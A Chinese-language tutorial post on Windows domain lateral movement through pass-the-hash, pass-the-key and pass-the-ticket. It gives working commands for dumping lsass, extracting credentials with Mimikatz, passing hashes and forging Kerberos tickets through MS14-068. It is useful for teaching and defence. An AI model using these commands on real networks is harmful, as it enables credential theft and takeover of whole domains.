內網安全:橫向傳遞攻擊(PTH || PTK || PTT 哈希票據傳遞)

內網安全:橫向傳遞攻擊.

橫向移動就是在拿下對方一臺主機后,以拿下的那臺主機作為跳板,對內網的其他主機再進行后面滲透,利用既有的資源嘗試獲取更多的憑據、更高的權限,一步一步拿下更多的主機,進而達到控制整個內網、獲取到最高權限、發動高級持續性威脅攻擊的目的.(傳遞攻擊主要建立在明文和Hash值獲取基礎上進行攻擊.


目錄:

內網安全:橫向傳遞攻擊.

知識點補充:

(1)PTH:利用 lm 或 ntlm 的值進行的滲透測試

(2)PTK:利用的 ekeys aes256 進行的滲透測試

(3)PTT:利用的票據憑證 TGT 進行的滲透測試

Procdump+Mimikatz 配合獲取目標主機密碼:

PTH 傳遞( Mimikatz )

PTK 傳遞( Mimikatz )

PTT 傳遞(?MS14--068?)


知識點補充:

(1)PTH:利用 lm 或 ntlm 的值進行的滲透測試
(windows系統LM Hash及NTIM Hash加密算法,個人系統在windows vista后服務器系統在windows 2003以后,認證方式均為NTIM Hash.)

(2)PTK:利用的 ekeys aes256 進行的滲透測試

(3)PTT:利用的票據憑證 TGT 進行的滲透測試


PTH 在內網滲透中是一種很經典的攻擊方式,原理就是攻擊者可以直接通過 LM Hash 和 NTLM Hash?
訪問遠程主機或服務,而不用提供明文密碼.

總結:KB2871997 補丁后的影響
(1)PTH:沒打補丁用戶都可以連接,打了補丁只能 administrator 連接
(2)PTK:打了補丁才能用戶都可以連接,采用 aes256 連接?


PTT 攻擊的部分就不是簡單的 NTLM 認證了,它是利用 Kerberos 協議進行攻擊的,這里就介紹三種常見的攻擊方法:MS14-068,Golden ticket,SILVER ticket,簡單來說就是將連接合法的票據注入到內存中實現連接.

MS14-068 基于漏洞:Golden ticket(黃金票據),SILVER ticket(白銀票據)
其中Golden ticket(黃金票據),SILVER ticket(白銀票據)屬于權限維持技術.

MS14-068 造成的危害是允許域內任何一個普通用戶,將自己提升至域管權限。微軟給出的補丁是kb3011780



Procdump+Mimikatz 配合獲取目標主機密碼:

下載procdump工具:https://learn.microsoft.com/zh-cn/sysinternals/downloads/procdump下載Mimikatz工具:https://github.com/gentilkiwi/mimikatz/releases
想方法把 procdump 上傳在目標主機上.
然后執行這個命令,生成一個 lsass.dmp 文件.(再把他下載在我們主機上進行分析)procdump -accepteula -ma lsass.exe lsass.dmp

在 mimikatz 上執行:(1)privilege::debug(2)sekurlsa::minidump lsass.dmp(3)sekurlsa::logonPasswords full

PTK:采用是 aes256 密文,那 aes256 密文怎么獲取的:(再在 mimikatz 上執行)sekurlsa::ekeys


PTH 傳遞( Mimikatz )

PTH ntlm 傳遞.(在 Mimikatz 上執行)sekurlsa::pth /user:administrator /domain:god /ntlm:209c6174da490caeb422f3fa5a7ae634新開出來一個cmd窗口:在里面連接(隨機的攻擊,所以你也不知道是哪個IP地址): die //要連接的IP地址\C$ sekurlsa::pth /user:用戶名 /domain:域名 /ntlm:域里面的密文密碼.(域)sekurlsa::pth /user:administrator /domain:workgroup /ntlm:209c6174da490caeb422f3fa5a7ae634新開出來一個cmd窗口:在里面連接(隨機的攻擊,所以你也不知道是哪個IP地址): die //要連接的IP地址\C$ sekurlsa::pth /user:用戶名 /domain:工作組 /ntlm:密文密碼.(組)


PTK 傳遞( Mimikatz )

PTK aes256 傳遞:(在 Mimikatz 上執行)sekurlsa::pth /user:administrator /domain:workgroup /aes256:4d3963f9bca16812119a7784a5bae5fcc9f5ba35eb769a89cdaba067fddf7335新開出來一個cmd窗口:在里面連接(隨機的攻擊,所以你也不知道是哪個IP地址): die //要連接的IP地址\C$ 


PTT 傳遞(?MS14--068?

第一種利用漏洞:(MS14-068 powershell 執行)
(能實現普通用戶直接獲取域控 system 權限)(1)whoami/user                // 查看當前SID地址

(2)利用 ms14-068 生成 TGT 數據:ms14-068.exe -u 域成員名@域名 -s sid -d 域控制器地址 -p 域成員密碼MS14-068.exe -u win2016@vnlntarget.com -s S-1-5-21-2387719572-2208999834-2475545985-500 -d 10.0.10.110 -p Admin#123
(3)kerberos::purge            //(mimikatz中)清空當前機器中所有憑證,如果有域成員憑證會影響憑證偽造(4)kerberos::list             //(mimikatz中)查看當前機器憑證(5)kerberos::ptc 票據文件     //(mimikatz中)將票據注入到內存中(6)票據注入內存:mimikatz.exe "kerberos::ptc TGT_mary@god.org.ccache" exit(7)查看憑證列表 klist(8)利用:dir \\192.168.3.21\c$

? ?

學習鏈接: 第68天:內網安全-域橫向PTH&PTK&PTT哈希票據傳遞_嗶哩嗶哩_bilibili

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/bicheng/22322.shtml
繁體地址,請注明出處:http://hk.pswp.cn/bicheng/22322.shtml
英文地址,請注明出處:http://en.pswp.cn/bicheng/22322.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

CodeMirror 創建標簽計算編輯器

在日常開發中對于一些數據計算場景可能會遇到標簽計算的需求&#xff0c;下面關于如何使用CodeMirror實現標簽計算編輯功能。 1&#xff0c;結果圖 2&#xff0c;主體代碼邏輯 大家只需要復制粘貼主要codeMirror使用邏輯即可 <template><el-dialogref"dialogRe…

抖店商家疑惑,自然流量突然下滑,為什么呢?

大家好&#xff0c;我是噴火龍。 很多的抖店商家會遇到一種情況&#xff0c;那就是自己店鋪的流量好好的&#xff0c;不知道怎么的就突然沒流量了&#xff0c;各方面的數據都斷崖式的下降。 為什么會這樣呢&#xff1f;原因有以下幾點&#xff0c;大家可以檢查一下&#xff0…

低代碼和零代碼軟件時代質量管理(QM)和質量管理系統(QMS)

【前言】 質量控制過程的目的是為了確保產品的制造標準得到保持和改進。質量控制過程使公司能夠滿足客戶的期望&#xff0c;同時確保產品質量的一致水平。采用這些標準創造了一種公司文化&#xff0c;鼓勵所有員工努力實現高質量的生產標準。低代碼和零代碼軟件可以成為質量控…

【網絡通信層】華為云連接MQTT設備

本文介紹華為云設備連接到設備的操作。 目錄 一、在華為云創建設備 二、連接MQTT 三、通信 一、在華為云創建設備 現在華為云上可以免費使用部分受限服務&#xff0c;包括免費創建自己的設備連接。 首先&#xff0c;登錄華為云平臺共建智能世界云底座-華為云 (huaweicl…

徐州服務器機柜租用的好處

隨著服務器的廣泛應用&#xff0c;越來越多的企業都選擇服務器托管和租用等服務&#xff0c;在選擇服務器租用之前我們還需要進行機柜租用&#xff0c;便于放置所適用的服務器&#xff0c;那么企業選擇徐州服務器機柜租用的好處有哪些呢&#xff1f; 選擇徐州服務器機柜租用&am…

Qt Window Dialog 無標題欄 ,無邊框,可拖動

1.效果&#xff1a; 2. 主要實現步驟&#xff1a; 設置窗口 flag&#xff1a; this->setWindowFlags(Qt::FramelessWindowHint | Qt::WindowStaysOnTopHint); 創建變量存儲位置 QPoint m_dragPosition; 對鼠標左鍵按下和移動事件做處理 void DraggableDialog::mousePre…

Java 集合中的組內平均值計算

在Java開發中&#xff0c;集合&#xff08;Collection&#xff09;是一個重要的數據結構&#xff0c;廣泛應用于各種場景。計算集合中的組內平均值是一個常見的操作&#xff0c;尤其是在數據分析、統計和處理時更為重要。本文將深入探討如何使用Java來計算集合中的組內平均值&a…

Web 頁面性能衡量指標-以用戶為中心的效果指標

Web 頁面性能衡量指標-以用戶為中心的性能指標 以用戶為中心的性能指標是理解和改進站點體驗的關鍵點 一、以用戶為中心的性能指標 1. 指標是用來干啥的&#xff1f; 指標是用來衡量性能和用戶體驗的 2. 指標類型 感知加載速度&#xff1a;網頁可以多快地加載網頁中的所有…

如何在vs code中安裝JavaFX

目錄 下載JavaFX 配置vs code工程 編寫測試代碼 下載JavaFX 網站鏈接:https://openjfx.io 選擇如下的版本

從1.0到4.0,看看你公司的費控模式是第幾代?

早在2021年9月&#xff0c;艾媒咨詢在《2021H1企業費控報銷服務專題研究報告》中&#xff0c;第一次對企業費用管控模式的進化歷程進行了清晰的劃代&#xff1a;1.0手工模式、2.0網報模式、3.0移動報銷模式、4.0智能費控模式。 2022年&#xff0c;在《中國企業費用管理發展白皮…

vr樣板房實景漫游展示制作解決了地產商難題

家具和軟裝銷售中&#xff0c;如何直觀展示產品優勢一直是老板們的難題。口頭描述往往難以讓客戶真正感受到產品的獨特之處&#xff0c;這不僅影響了銷售效果&#xff0c;也增加了溝通的難度。但現在&#xff0c;我們有了全新的解決方案——樣板房VR全景編輯軟件! 樣板房VR全景…

精打細算:可燃氣體報警器檢驗收費的合理規劃與管理

隨著工業化的快速發展&#xff0c;可燃氣體報警器已經成為各類工業場所不可或缺的安全設備。 它的主要功能是在可燃氣體濃度超標時發出警報&#xff0c;有效預防和減少火災、爆炸等安全事故的發生。 然而&#xff0c;為了確保報警器能夠持續、準確地發揮作用&#xff0c;定期…

科技盛事即將拉開帷幕,WWDC2024官宣定檔,亮點搶先看!

隨著全球科技愛好者們對蘋果年度開發者大會&#xff08;WWDC&#xff09;的期待日益高漲&#xff0c;今年的WWDC24&#xff08;蘋果全球開發者大會&#xff09;&#xff0c;正式宣告這一科技盛事將于北京時間6月11日凌晨1點拉開帷幕。距離WWDC 2024的召開只剩下一周時間&#x…

【電子取證篇】電子數據取證標準合集更新202405(附下載)

【電子取證篇】電子數據取證標準合集更新202405&#xff08;附下載&#xff09; 電子數據取證相關標準合集&#xff0c;按照司法鑒定職業分類目錄&#xff0c;對電子數據鑒定可能涉及的測試、測量方法進行標準歸類&#xff0c;更新于2024年05月14日—【蘇小沐】 &#xff08;…

前端localForage存儲數據使用教程

前言 前端本地化存儲算是一個老生常談的話題了&#xff0c;我們對于 cookies、Web Storage&#xff08;sessionStorage、localStorage&#xff09;的使用已經非常熟悉&#xff0c;在面試與實際操作之中也會經常遇到相關的問題&#xff0c;但這些本地化存儲的方式還存在一些缺陷…

「技能培訓」硬蛋學堂職業技能培訓,助你掌握未來技術!!!

硬蛋學堂職業技能培訓 &#x1f680; 火熱報名中&#xff01; &#x1f680; &#x1f31f; 2024年已過半&#xff0c;我們迎來了年中的轉折點。你是否還在為年初制定的宏偉計劃而奮斗&#xff1f;是否渴望在職場上更進一步&#xff0c;卻苦于缺乏機會和資源&#xff1f; &a…

systemctl系統控制器

systemctl系統控制器 作用&#xff1a;控制服務的開啟、關閉、開機自啟、禁止開機自啟 查看linux中所有的服務 systemctl --type service 檢查服務狀態 systemctl is-active 服務名 &#xff08;簡要&#xff09;systemctl status 服務名&#xff08;詳情&#xff09; 開…

期權懂題庫免費!期權開戶測試難嗎?多少分算合格通過?

今天帶你了解期權懂題庫免費&#xff01;期權開戶測試難嗎&#xff1f;多少分算合格通過&#xff1f;期權開戶測試通常要求投資者達到一定的合格分數&#xff0c;以確保他們具備足夠的理解和知識來參與期權交易。 期權開戶測試難嗎&#xff1f; 期權開戶測試的難度因人而異&am…

【設計模式深度剖析】【1】【行為型】【模板方法模式】| 以烹飪過程為例加深理解

&#x1f448;?上一篇:結構型設計模式對比 文章目錄 模板方法模式定義英文原話直譯如何理解呢&#xff1f; 2個角色類圖代碼示例 應用優點缺點使用場景 示例解析&#xff1a;以烹飪過程為例類圖代碼示例 模板方法模式 模板方法模式&#xff08;Template Method Pattern&…

C++linux下使用clog和重定向實現寫日志

Clinux下使用clog和重定向實現寫日志 實現文件基本功能測試編譯運行額外知識點 實現文件 LogUtil.hpp /** * 通用日志實現 * lsl * 2024-06-04 */#ifndef LOGUTIL_HPP #define LOGUTIL_HPP #include<iostream> #include <time.h> #include <cstring> #defi…